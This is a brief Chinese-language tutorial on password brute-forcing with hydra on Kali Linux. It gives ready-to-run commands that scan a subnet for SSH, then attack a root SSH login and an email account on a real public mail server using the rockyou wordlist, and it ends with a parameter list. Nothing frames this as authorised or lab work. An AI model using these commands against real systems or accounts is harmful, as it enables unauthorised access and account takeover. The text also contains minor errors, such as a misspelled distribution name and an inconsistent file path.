Kail Linux有一個的GUI版本:xhydra,也有一個命令行版本:hydra。
xhydra:
hydra:
我使用命令行版本:hydra
字典
這種攻擊需要字典文件,一個好的字典至關重要。我以Kali Linux自帶的rockyou字典為例,位於/user/share/wordlists/rockyou.txt.gz。
使用前先解壓:
gzip -d /usr/share/wordlists/rockyou.txt.gz
nmap確定開啟ssh服務的主機
nmap -p 22 -open -sV 172.16.1.1/24
暴力破解
hydra -s 22 -v -l root -P /usr/share/wordlists/rockyou.txt 192.168.0.108 ssh
爆破郵箱密碼
hydra -S -l test@163.com -P /usr/share/wordlists/rockyou.txt -e ns -V -s 465 -t 1 smtp.163.com smtp
下面貼一個用法
hydra用法: hydra <參數> <IP地址> <服務名> hydra的參數是區分大小寫的. hydra支持的服務有:telnet ftp ssh mysql mssql vnc pcanywhere RDP(3389)等. hydra的一些參數: -R 繼續從上一次的進度開始爆破 -s <port> 指定端口 -l <username> 指定登錄的用戶名 -L <username-list> 指定用戶名字典 -p <password> 指定密碼 -t <number> 設置線程數 -P <passwd-list> 指定密碼字典 -v 顯示詳細過程